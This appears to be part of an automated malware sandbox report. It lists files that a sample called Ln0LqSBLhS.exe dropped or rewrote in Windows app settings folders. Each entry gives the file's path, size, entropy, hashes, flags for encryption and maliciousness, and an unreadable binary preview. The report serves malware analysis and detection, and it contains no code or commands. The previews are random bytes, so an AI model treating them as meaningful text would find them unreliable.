                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998879120074646
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:EAGTPSg0ALab/ZOEllMHWRa4j3/VicoTHj2cGnQNZf67W3P6y:reP1LazkEI4HP8TCc4n7W3P6y
                                                                                                                                                                                                    MD5:419924293627661F8D6FD9E234C6818B
                                                                                                                                                                                                    SHA1:F229CD21AC3B50D11387CB8C9247AA15D7D2C68B
                                                                                                                                                                                                    SHA-256:6D56D148FF55E2468483DBA3244F14E3B3259174E909E2E256B44CD49D674DD1
                                                                                                                                                                                                    SHA-512:4F5C1F16BB83DFE1DD7A5E5C3122D15C0B998A054C89736C01DB71BF1E6BB06DB14460735570C572FEA9F8D54D7F46A30BF6FD6494C57BD71C8AD83F4B947A11
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 6...~#W...3..``.....H>.E..#f..Q.].Uy.?.2w..b...1... ..........<.-...._ h_...1B.~..G....L.....n#..f.~U..M_........0... H).UNf=..".GTCK..^............R2.......(e..3NL>S.h.j.x<'.....[W..............Z.Z...&.S.Zy.......A..<.p..r...w.....-.9.L.....R.Q...b....H.}.....vyse..^m.x.+:g..V...5..3....kI.YT.SMI...+.u7.3.......F.c..>.y2.Va.H....2......,)|.S{.^/...._QC2q.......j`m.'....=<.%.f..Jk...w+.%|.f.n..X.......W.>&...!....4..1[.Lly...RtKf3... `hL...KD.....H~...D@0..A.Y9].d./`.HBw...%.......0...Ln)o.H...'.d.[...;>a...3. .N...P..=.7Y.Y.M.....a......)....}..`.r.z..h.}J...S........1.F.yy.7,.....+>...o.|.`.>.8.;).V....8....!.J.tp..n..a.v...'Q.;j'3..t.Bl.~...[.F8.~...AYUo_B..(/..F...tp+....3.....@]p...P..8\. :..F6.<....9A......:....(.1QD..$.#yb0...$S....kLA...g..Q.....x..I.j.......`..dPUa...n`...v.?bC.VEw.........._.A....Kq..70....>h..;...3.....M..|..s.<A....G...;.....fo.m..v..o.._...qw_.2... Fy.....b...C...V..."-.C.....A]<-.O..H.gcw3tPK.g$|...[R..&j.I%.&.z.{.P.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65865
                                                                                                                                                                                                    Entropy (8bit):7.996708445874499
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:mBXMY0zhM+jqD8A7dR2OS9SJo1Y497x38RPrbsXA06C:oMNlMvfySL45x38RDq
                                                                                                                                                                                                    MD5:CF72B0F07648F58108132C7C97C79D44
                                                                                                                                                                                                    SHA1:6C9FC190875C9576C801C1EBD36DD25CF38B2C5A
                                                                                                                                                                                                    SHA-256:69C4CBAF35FDFC86994AF8C5AAAE6FF666D046CC0297CEC2D1BBF9509E3F5A51
                                                                                                                                                                                                    SHA-512:99A00FC1116D26994ADF100665090969048897E531974291063BAB2486D747AF1428A5DB3A34F1FECB9E9F088C8EF596FA7413A6B4084DBDA46B089CFBCA1E0F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..=I.NP..K.f.PG.Qjj.^...-D.V.....2...m..L....6.OG]..L.....q.r..!.O(.tNq.s.F.=..c.E.......%.FnOEuc-:....jN...3....4.....V..W...J.1..(x.w*.m..j...H..v...@.....(..(..$..2}7..3a.6..1.(;I.. ..t>,.4G....J..Q.l;..........L.UB.|E.L...q....3eWs.t..... |..e...*i=..`TlOq..y.....D...B/.....d>.,^.._.I...9<.~.e..W..F..v.B4#N...T+....Ni[...V.....4...Iv.u......_N.Y..u....qd.}.hb..*..;S37N....../...9s...f4.z'...t(M..E.8.......Ch...:..U...>.KP..6.}m...l.|..+QR.....e.jE^.3r.._P^_T.. [....0XB..[p....ew.\.4.K.C....]+..........hBe.~.'hg#..~..T0.a....59..9.3.1..(\7.........7>T9..w&.1.rX:.Z..[....v.s..p#.t.....j .jvc4h.....I..=K.$.J.^W>.....iaN..sT...q.Y...,g.W.r.Y.-........./2r.g.....1'..........:p.W..X[eE..D%?.....j.7w..t.,..K.....~......sq.X/....M....YU.O...n......G...q...V...^-.].}..n..*.%.orz._3q4^...l;....X.....w..t./..w.......C|..I9x.....|.`..nA.]....8..`...(...................kv.\EK.OF.k..-........d....>.]....<...^R8.j.(Er.uo.`$H.._4.".t..E.3B..&1.J:...~.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980291767383138
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:DtdniVO9trfwZfCY5mL1oDifptQTMCmMWizVwGIqMLsTvcv:BdniyZwZfCY61PfnQjWkVxIqR2
                                                                                                                                                                                                    MD5:CD79E7BC09DB803F9579F19B7E99F119
                                                                                                                                                                                                    SHA1:C6C6C1D183A1688C8F2BBFD8EC066287106DCB95
                                                                                                                                                                                                    SHA-256:21B3218AF12C1DD203AAB66CB8B8360E1E19A1B9126A7876214E15101D5B38EC
                                                                                                                                                                                                    SHA-512:A869C335563C8ED6582A0A2683EDB9F68593915F2E397262ED150033E433A4EB7E054537A2B9489EC5C614C1F5AD71C1A70F0ECF301FB026C067F367DAFC79B9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: e.<T.|....!....v..h.z......T.~....R1.b..f..N...}......kVo!.=.R*...)...K..&R.U...{.1$0.Q....*.W...*..X).4dK.Y....~j....]../..*.......{..,2..B._k..`N...Js.=\..'C..XZ.....6y...k..Mv)...0.;......e..'......w.q..g.g.tK.^.HV.S.eDT..,...b....Mi....<.?.[E...'O....-N3z.d."8fH....a..{V.x..1......r..A..t......'.ki.v......rlT..qxN{.L.....q.h.{HE*.(. \.3...T...............z.w.EK......fD.`T..V....0......@...D...z..b.M....8....../f3/.^t..Q.Ks..@..sV..@.....!.0...{F..'<..j.......T.....,T@mG......../....U1Y%9..!w#&...z...E.m............`...n..&.SW.O&.SipY.]...!.~."....RS...A...8."..=m3...u9....&...>....?J.6..:..+.,..9<~Oi.^._.X...^...+..!.....y...i..[-l./3...Z3.3....t.lB..<.\...C.;.u..tK.&)n?....u...ZY.!.{.<*3.y.SO..n...u7{....d.~\6?.w........F!B|.O$C^..p.m..rB..O.#...~.K/=..s.......r7c...v#I.(.k:I..?l./.f...'..,'.G.....b.@.z..0.....c0.G3\....7]...No5\...ti.g.n..;.....6....Q.H....7F..-.#$...%9..P=&...}.e...I..5H...T!\0_G..]..F......H.pp............0....q]P..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977874113419364
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:slktPvzKV/vbmy2fJatk7pqidJUV8oZ9xTQJbGO/:sStPbKV/Cy2st20Yqz9xTQJ6O
                                                                                                                                                                                                    MD5:EAC48E61EEEBBABC622829C673D4A031
                                                                                                                                                                                                    SHA1:71C8408DE764E4C8138AA01B5268729183C5F9E3
                                                                                                                                                                                                    SHA-256:BC03CA7698CE0806CC2500ED83D7627DD167E652B1C03EFE312D524A7F4BB2AE
                                                                                                                                                                                                    SHA-512:3E38C0B329F75BCF03EE14A8C7A79C2472489554E942EB9DDC4583B2C2BF61BE3D314A8D061E48A1AE96A76C30AEB7AF0ECF6DFB08CC6D5CE16AB701058238FF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..D]..;..p.]..u.r. 2..h.}....w.l..7. Hn.6.!;...l..|...........e.......Z...FJ.C.hY.+'...p]-...0.!.O.k.....q..v..`.f.r....b...P-..R^ ...0..w-....{........kD.Mc.'.....(.mU.A./..gd..'..o.....*..8...>..w.l.F..Xa...s...6....!](0I.B]...L.6...w......e..'....K...um~..k.(.`xk.....;.Vo.B....V..>..O )..E.L.....|.=..I,A.."Gk.....P...;@B..eh..F...C~.|.B..j....0.cS.x....(..#.........qB.E.C..v...f.....D.M....'..Ha..T....ER..U...`F..Uu!x.7.p.....XO'{.)@.....s......+.#A!~......BL../...4%....6.^.."k.$.j...R.".W*...$]j..B.\K/.@X.G..].5..`\..l.~.K.E..wl_j&r..H.?Oe..hJ..<c.D.1....v....Kk..X.T;;.o..&..z..k.....L.$..Rf...0.f...'gcC......m.T.u.!.[.1DN..{...<.TA.b.h,..O...>..L..<.....N...\c.B......`i....J......@..=.X=..YS..z...A..n....#WY.`5.....&..#.."..<........M.g.z...M..z..avq..!.R...L......tV-l.p..........5.E..V.*U.-EH.7d...c.o.....l=V.....%.O.6.@.f.~.".E....k\..=.a..*.e..M<.....j.....!...9....M......"..F...uM...K.y....w@.pS..,..q...P!._-./....y.x$H..v....CZ.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977011371172465
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:N6vX5TPSLcqZasFQpfdUBLFEk8SWSLmD4:0vJTq4Ykoac
                                                                                                                                                                                                    MD5:6D36006E7ADDAFB6FA81AA3690050120
                                                                                                                                                                                                    SHA1:B1B369BA4B5A566D01DF7A7E52D80BFEAC267AC3
                                                                                                                                                                                                    SHA-256:892C17708B86E4D99A3677BD79B84A17124D55E9A83BB7E7289D314502EE4CDA
                                                                                                                                                                                                    SHA-512:4E1443FCA09A390A0ED757BE9A07AE91B76EE2FF5D4A117EFA59675B7476750E57BE1AABA41105692D3D12AFB52A8BD3F92A4A7F981359787010DF29D34E52A7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: +..?D....U.z.p....X....&..qxN.......SK..!.(c.......2g.....1..M.!...t._....he......].XM..A].Hr~....Id|![..S.M.-..H.....@>?JiELXY...fJ.j6.+..Nt.y._.A..O+..u?.+A....f..}f....Fv..#i7....P5H.V...}....7...X......QP....d..>7.s.$..J...W..5o..*.lW......u........s*.'....>..g%.M..lI.}......m...n...o........{..d..3c...S>..G.y2.m.....x&...z..".B..#..r...?M...,..x.0k?.n..1......a...K.Y..].].0...g.....1I..2}7.5.`.f....("..L......L..tQ..........m7g.3.p..A..u..]...bg.0..Y. .p..EM`T.mL..t..1.#.-.Q.9...k.I.5.6.xy.^a<1=.j......CP...c..T.!....(..k....bH...Z*.r...t.>c.....e..q......MZ.....%...D.b5.|.).....7...NL?...S.0.Lb.@!.Czd6...z.n/...}......._.. I.X..\.m..GX......7.dU......j...6/......G.....8....J^.Z.WvO.%.s.L.-v....;l2..N?$Q../|Z.J...%~...2*.J3Jp...V./.I}.^..B..3..>.C7...W...w....e/.+mm3...:I...TR....8.....W.......R..........)....9.x.$u.,...Q=.LHb[6zo....F....*9n.8.U.mb.[r.x..UY..a..}.....9.=..y>.#.n.?#..J.....xu.{.._*.l./1...=^..F........<.g......<.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.974561785646346
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:9hStaZ8vPeFcjj1+6CjlXZI4Bd8kLISIctpZv/IF3iQAtOleg:etaC39Q6CzICpplFQA1g
                                                                                                                                                                                                    MD5:037E70048FD332DCFA88657F3486BC7A
                                                                                                                                                                                                    SHA1:2FEC7454ED5594940DF5448F1A8C6DA3782EE155
                                                                                                                                                                                                    SHA-256:E4844F1AE81DA4B0C4D9A86F0DE7C833CEE0A6696710600BB70092134CCA3745
                                                                                                                                                                                                    SHA-512:3D620732B96A0405AB9DD8D51385081A01F4DF34098D215F1283B73B56937AE4D0154C2BBB25479ABC245EAFBC4685C1DB1EECAB14B22E29B7DE73F9DCDA1F5F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 1I.Uy.EC./..\.Q..ms..,...i.`3...oa.......[n.....q5...@..VT.....y..K..%.^...|.U..5..j..8u;...~.,U....i......Fq.j0+..{x...#...w.g!...0O.'.n..!.IW..kt.$..K.f.6^3.i|..c.>.y.............[.......^.(.t..v.Y.-9..H..0.Z.l.1..)S{=...."...s...:J.0...YH.............Jk5...s.k.U.f_>.{.b...N%wu..*+LX..3..n....q.3......c..kL%kU.....Zl\#..fP.!x.H".....{...M0........7Pm.....h(.m..x...D..C.-9.Q$...\v.m.6-b..;rF/.Kp...j0.c...^...\j....F.<..I..y....,E.F...O.@.?.[+.\.....Y!to.C?~.....vz.+..S....cp....=..=S.y.......r..z|g@.;............Ue.W.8..rI5.........\B.Mx....g..!..D.+...v..a...~..{.c.s..v$.|.%.=2..A......1...X&.XK....E[.u.3+*.t.).ykM.+..H".-.\...Z.L..o..~....0e..w. .;c.ho.@..[..6.</...`.8.6eD!.+o...d.;......+xE....c..i......Q.-.Y.`......t<.n.j@.....n3.....xe!.<..9.:G.62..c...A.!..~aP..$.....!8...!-...D..er.C..$..w..K...... ..<....lq..[."F..k.o.J.@........=.....p.='.9m..b:6XX.LfQ..b.W...T.....(.q&j.!.:.6.s5.:e....;H.,&G-..........S..%.j.1..A..)%....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980115677500191
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:cxE7wEi0jZIr2PGo+gGvligyOz6ymE5+sOBHNU8aV/nQ3o:kUwEiqayG93DmE5+rfQ/Q3o
                                                                                                                                                                                                    MD5:3302919B572458CBBB9DD94817D92DA7
                                                                                                                                                                                                    SHA1:34750A653AD9060C2E3CBC442FFD76F5C50EE725
                                                                                                                                                                                                    SHA-256:204F21EA4292CE9F6E7A9164BA7970F85C2AAE49E20F8E7FC128DE1B85FB38A6
                                                                                                                                                                                                    SHA-512:C61B59D978166B1C7C3AF7BA2815562A3FE6CE7B7065A69B0DAA30FFE6BA8CCC54F30125D4EEAF338D0DB14C3FE5F5B73E63B407DC7426D6155F4457DA5F4783
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: y....+..Fe...V%r7...C..-.F..R..Q.4....p...U...!........&../"...t..)`4H.~"6.).u.h..\.I..kP^....C..5..}..1-.3..B..S...;8...9/+.(..R..>'[V...c....qN.X.&.....q'y:._.n...@Z...pe...y.d..Mf.z.S..N..@$.k...............S.D..l..U[c...._.....*.....+..L..oVI=.....t....:....l......t.....\.4......|...3h....9....k.".e.V..]..w...&.8...]E...((......7P1.l......oh......>H."8.w..S...R..Bm%.r...o..Z...Xo.......!..r.l.._^.|...a..mCH+...y.s....7.........`...En..;...M...h..m....4.S.@..-.:1....K.".......W.S2z=q...}...9..*.|...yucE......!.".4.R.n..8/.......<.W}..X.1.p..O.xe.....y.?#.".'.7.*<..P.. f<.A.E.Ir..@.N.lN.i[..A.B...a.$....\...R...P..l..=P.|N.Ax.U....~1<.z...{<.*S.P...i....gs...z.E"n.5w...N....b....J.8....W....."}.D.*.....F...x..49!.....(U...c..sD.r.y3.......hHd!..M%.9p?#....#...J(....].WX_.+`..JL._.j#u..g..OZ.)...)W./.(..........7.g].i......k......3.5.L....:....q.-l..H<.U~..."...1(e.X6......q....(...$Bf.UEe..C.c.o......8."..".H.48.n..x.....Q?..P|..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):46901
                                                                                                                                                                                                    Entropy (8bit):7.99560052451221
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:Kw2uPEa52GdJiQdiOwupzKYPtAWfuF2hRuzodBic8SplVSHFNY9WW39HDF:32uPl3ndlwW9A4uACQ8aVSHFCAW39h
                                                                                                                                                                                                    MD5:82FF5156BC29671F49EFB4A21DA25962
                                                                                                                                                                                                    SHA1:D6BE7FA219B7A8863F5B01C4DDEA843E84C36D41
                                                                                                                                                                                                    SHA-256:A9FB91F43F6324DA56CB527B5AF9D3A446391ACA6D17EF8599DAF14C18118A46
                                                                                                                                                                                                    SHA-512:47D56CA835128BFC9908B436B75107E6FAF91EFE6EBBA71FAF1DDBBBDCD87AF869271C09335AACAE39F81D7BA3D00829F828A1577BBDC38D1864F047A44FDE93
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Ns8.;....a.x.....N....j....8.H.,.cN.3.....}.*..}.7D...hy........*.c..Z\....m...L..2N.....vpX...:..0...<S...k..M.L...@[.....o!.XQ7.TMt%.E.R...I..S..\\.".E...%/...........R....d...(...3.AA.m.]..H[..cM.._']]....0.{|.....Ii4....L(1.;.^.'..x.~G..1..AF.....p.....R...w...b.1(]m..tF......Z..Q..j...r.+.%.W./.-.....v.y.......+n....*h..<3....U..-.d..&+5N%]_..b.,s3.9.MlY8..e...W../.19@.A...\..Y.....I.pk,4..X.e...>.."u....]a).y4M./8..D...V.......[.Y.E..s.5AQ....CJm.P..',..q.i#..T...D.).?.....Ii}0\...sm....^.#...[O.}9..m.8;.x.e.,......&..v....2......Q.(....1.z...?..}.".s..]C@...k....S.8...K.WNg}.]o{......V/..35oo..........CM..e...Ya'..g.{.:.Iw....Q...`........M.<...."I.](.Q.s......S.0..(>.[..;..~C.j...V.d.[1...(..J...<........U..Z.g.....|.S<~}..jF.l.v...n..H4....u.uHi.f/-S..Tk%P..Q..r..H..3;..]k.q..0..*...HY..U.K...f.Q~8. .t..r.W..........&)....3S..B.I."..t...J<L.o,.e.6o.w.^..N..<H82.P.:...1.?.-..LR.'F>..p$U.......,....T....&...'...5.=..~.....sj.efI".
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9762773940904985
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:78HkRtnsNKJq5Bs1HTGrAL0kSX0kw3cxgrBwmRAj:7CkLsNBcHCrJkMurZe
                                                                                                                                                                                                    MD5:08923ADB171B1DFB89E4F11844A7ACA4
                                                                                                                                                                                                    SHA1:C6DB34501E3D020F50E307D8A6EB8DF5554C99F9
                                                                                                                                                                                                    SHA-256:0851613667AD36490B17B0DE1DE27F38087AADA46F9C572D08CF708B012026AC
                                                                                                                                                                                                    SHA-512:A82C6981E079C88745B15F4592D9FD6F338932CA7292C90C79B224D3459A304047678E55C412FDF593FC9EAF7D4CF78984ACB52C59AA865A0BA5152893212865
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: J&+N....=.'.e....C..v3.kV.HJ..^...tc..x5..q.1Q<.....&d...\.c.3..#..wJ..G.M)I.x....7..g.P.%.46...s'i.....P:........;.........$".G...b..........@....".M.......m.2..^d(..."~..(U...2.vz....."..0."|`.sK....+.K.B<@.X..e|).8$...uh.|.A!...q.p.I.;.g..^V.b=s....e.-r.j..r..[T.......$....F........)}..3.@.."..w..;\Pu...\.].B.d.]...d..........W.D........A..I=n!'.c....;=.....=.6.s.;.v4.+U..Q..9.b..I4..^gc.?.8.F....Y......8<.H...,......us2..}..e.f.x..+..v{.q80(.P...[..8....3....".......t.IS^.s........z1Cy..j.b9....h.0..~i..M........?8.\..?aRkAT....R.qp;'=.H7..i.E....p2Y#...3..6...RL=..5..f.&..ctA...Wn....._<.q.]hm...=Su..d..9...l.%.Q......RPf.....C.\...."b.H..n..7X;...]q. ^..8........s.d.'*g+.....v.,.....E..T.......^...]+..Z..-b..r..z..^D|T...!.6...7..R.&0U|.ofP......\.v..'"{Zy.F...q.J>'...l..5....N.Zp.....V...<...i...c...8z ...R)..ek`F..]........c@.....V}s....!...Z...V..E..4...^k...E....r.y0...................\d.`.....]..[..z.fvE8.C./r.P....<7..0....u-.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9790733146531725
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:ULYdWca4XnK9gsCkrPDla/2dkiN7+/X411WIuN5sON8+U33LkX:pdWsXtoH82kMqKnuTsOO+U33Y
                                                                                                                                                                                                    MD5:750BFA96439559725471AF20B10B1971
                                                                                                                                                                                                    SHA1:44374EE68494105D14430CB644ACE493AB48AC47
                                                                                                                                                                                                    SHA-256:2D2808C5CD1A8DBDD46472384FC86F4AB9A581E039574274F72DB3A54228CF33
                                                                                                                                                                                                    SHA-512:EFAAD29E251E6332CD6DF337193D6362EB1CD6E91831CD8266DA724B976235C48EC9342AC67D45E1BF0C6E8490EA62424DACF2D0573660A5BCD488B9B8C538E3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: f.X.Y..._h.Zl..+:.]P=..fo'.c.Vg=.dV..)....G....]....z...b...S....l....3%.p..s=4.y...D....R]....z..;.T.*^.0....Y.W.....a.9.}d9...~).i,XC...k..:..&...B.&.S...j4.]......s.09....Jd.! 2..N....fRn.rZeY.Xy.:F...qEo}.E...@J....G$@...s~......d-|.'....<......{fj.y........_]./..G..2uN.....2..Z..O...........v.<O.,W.3....\..v.f..j.WK....2.CU.g(2.-X.B>....b<m.(.3V...6S.H.J.....Gp....h.....3....Rc..u....O...*oq..H.T}......GhR..f ........17.J., .a..A_.(.h.)....t.q....'K.67J[.."l[.}.\..2.OV?..G..%-.ol).b..:.+)...a.(.[.H..c...jV^..r..#.a.l...t7iS*\....'....A.U(V..H...jO7B@..hr.../.p%...a0..x.1Q..I.T.,...v.C-L_..eQs.M......j,.9m.....(....3.=.B.@.\......y.f3..k....z....e....60.(..6..s...XO......`.f.....S"...du"._..^48Qw.O....S........2%.+...M....a.....O,v.qs.".l.}..E.)Cn.@..<@u...HF....R...&......s."<.(.{...@..#3.....%...M.9&.=...`.ku<.S..!.f...[pa.xe.q.Q.*z.a.p\R.....O..-......Q.Av.....v\..y.WE.w.~...L8..?.../..K2%r..rCn.y.p..)...<.T%S..r@..e...c..|k..6...4
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9749242592067935
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:PizVICIzwcaWJvZTlEJy6mzqjGQxxCR2zcLB8s0JSKyPjd3ZDTj0Jk567:qzaCOVfEJzXjGCCkcdYJSzPjd3VTjy+M
                                                                                                                                                                                                    MD5:875967E1B791160E82238BB5FDB1016D
                                                                                                                                                                                                    SHA1:38458855D24E7F762840F491C8C4CDE4D32E4781
                                                                                                                                                                                                    SHA-256:89887A003D1AAAB8C888C887B43907125D2E01594A06706F594A66D4C325C73A
                                                                                                                                                                                                    SHA-512:E5393864F6299CED7128ED9A2384142C4015E02395D6C6F26A46A83A11C976991AC0B8B9616D2598C8D647BBE8671DC833E5B942DF0DDCBD3D45D99B978209BD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: x.41p7i..A..4.a...'.....2R.P>C..V...&..."..%<%x.t..N?U....~.=.Z.@.x..gO.......u..n.3.-..6..1U...(}.<..~.l......Y.?./..J~....^p|.7.....C..#.....$....X.1.."...uoT.Y9 .T.p.}.eA..R..f.V.).Gn.......T/......}v4.Y.......)K.t .;...>...Rr..Y.o.$..O.M&.#....:....f.L.......jhL:=...PM.&m.J....B..G.\..;..r.W.#.e._.Q..;z...&^.wh.'r.......[..\......-pMp....?.`Q]P..2~...-.O.|\.&D....<.eN.XZH.s.2.kS.m..j:...o...>....u.:.k.............p..pw.J...^y5V.L4..!.....5|...M.!..T...M./.=;vX....V.D.f.1,J.?......0I$.(.....#sts.Z.L..P5.H..f...z@.<....$.q\..f..:U.#.SEJ.O........G3..{TU ..f....p.3..(.^."..aG.p@b.FU& ....z....0Qb....)......2i..o......g....e}..G?.......T.$..H.....l55.].L..}D.^....SW?.)....v\|..I..%`.K.Zb......A.~T.3..P0.$...P...FD.@K...S.,....$...V...7.:....6b|J.c..&P.yEZ...|....s.c....Bid..wv...(."...tY0#.g.!~l.l...2.I.-H5...I.,...uRp..|V........t.:.GY.<../.........T..=... L../..........8.vWd.!.@.&.@~}..9."H..o.jq..:....0..'#.^.....%..|N.......b`v.........W ?..t
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980524658315609
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:y2SSsrJYRWjhThUYnVVh2Z5oFfZr23U0zQ85Ykyvv4Vyur:vSlGYjxhzVIrOkyvgUur
                                                                                                                                                                                                    MD5:72A02EB8DF8FF207884AC28DD3FD61AC
                                                                                                                                                                                                    SHA1:357CFB9475FB124CBC2CA61FC35E1A2E7A1F996D
                                                                                                                                                                                                    SHA-256:62B09E4FD0CCFA8A4D88D9A5CBC0F84FE9BC109AC9138F0B74DBCCEA86771CC6
                                                                                                                                                                                                    SHA-512:324B7FAAFBAB48950EEA5DCBEB9A18525D3B34CFC51BD5BA7920FEECF643987B7E4F6ECC98E2C8CC595FD897FEE092759C4EB5F32C08488118C34967CABD5730
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
